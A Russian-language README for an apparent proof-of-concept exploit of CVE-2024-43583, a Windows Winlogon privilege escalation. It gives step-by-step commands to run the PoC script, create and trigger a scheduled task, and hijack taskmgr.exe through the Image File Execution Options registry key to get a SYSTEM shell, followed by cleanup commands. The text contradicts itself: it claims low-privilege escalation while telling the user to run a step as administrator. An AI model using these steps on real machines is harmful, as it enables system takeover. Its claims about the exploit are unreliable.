
Доказательство концепции для CVE-2024-43583
Author: No0B@ckSappi3 Instagram: No0BackSappi3
CVE-2024-43583 — это уязвимость повышения привилегий, затрагивающая компонент Winlogon от Microsoft. Эксплуатация этой ошибки позволяет пользователю с низкими привилегиями повысить их до SYSTEM, что приводит к полной компрометации системы.
Эта proof-of-concept (PoC) использует перехват отладчика (Debugger Hijacking) через ключ реестра Windows Image File Execution Options (IFEO) для замены легитимного системного процесса вредоносной нагрузкой.
Затронутые версии Windows
Windows 10 (1507 - 22H2) Windows 11 (21H2 - 24H2) Windows Server 2008 SP2 - 2022
Этот эксплойт предназначен только для образовательных и исследовательских целей. Не используйте его на несанкционированных системах. Неправомерное использование этого эксплойта может быть незаконным.
Убедитесь, что Python установлен на целевой системе. Если нет, используйте скомпилированную версию .exe.
python poc-43583.py
Создание запланированной задачи: (Запуск от имени администратора)
schtasks /create /tn "LowPrivExploit" /tr "C:\Path\To\python.exe C:\Path\To\poc-43583.py" /sc once /st 00:00 /ru lowpriv /f
Запуск задачи:
schtasks /run /tn "LowPrivExploit"
Запуск эксплойта: Откройте Диспетчер задач (Ctrl + Shift + Esc). При успехе вместо него появится оболочка SYSTEM.
После запуска эксплойта проверьте свои привилегии:
whoami
Ожидаемый вывод:
nt authority\system
Запустите скрипт повторно и выберите вариант [2], чтобы удалить перехват.
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f
schtasks /delete /tn "LowPrivExploit" /f
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"